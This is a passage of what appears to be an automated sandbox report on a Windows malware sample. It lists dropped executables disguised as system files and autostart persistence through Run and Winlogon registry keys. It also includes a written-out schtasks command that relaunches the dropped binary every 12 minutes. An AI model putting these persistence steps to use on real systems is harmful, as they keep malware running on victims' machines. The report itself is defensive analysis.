                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\GmHIOoGs.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\bCyXfazS.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\xbtTyUdE.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\DldKqVbv.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\fxzonGoL.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\yKbtGcJa.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\KInsUcJl.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\PFcqhLrW.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\klRmPCEz.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\ZeYGhBeG.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\qmplAoJV.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\GameBarPresenceWriter\services.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\RbOZahUq.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\HtvJqEPI.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\yKbtGcJa.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\fxzonGoL.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\WPgYDdje.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\MgNITBew.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\uUlCzfJh.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\klRmPCEz.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\bCyXfazS.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\SYphwgjk.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\wySLBGmi.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\ADqcsYvZ.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\NPGqEfku.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\wNAllcuf.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\tWJuefum.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\rMnteNPl.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\hdUdukKE.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\YALoKruW.logJump to dropped file
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile created: C:\Users\user\Desktop\HkLrMVoC.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\GmHIOoGs.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\eJTFZLay.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\CNYkWNAB.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\quZEfXkb.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\MoHhbGed.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\CFoRreZv.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\lyXnXruh.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\dVPxoyeA.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\KInsUcJl.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\qmplAoJV.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\ZeYGhBeG.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\OquQxqjY.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\xbtTyUdE.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\UAeHorhP.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\rAXMkKSS.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\hREwAhMk.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\PFcqhLrW.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\oPsvdwHZ.logJump to dropped file
                    Source: C:\Windows\GameBarPresenceWriter\services.exeFile created: C:\Users\user\Desktop\DldKqVbv.logJump to dropped file

                    Boot Survival

                    barindex
                    Creates an autostart registry key pointing to binary in C:\Windows
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                    Creates an undocumented autostart registry key
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run servicesJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ZDtOzYsYYWKWEhNYzFcJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\GameBarPresenceWriter\services.exeProcess information set: NOOPENFILEERRORBOX
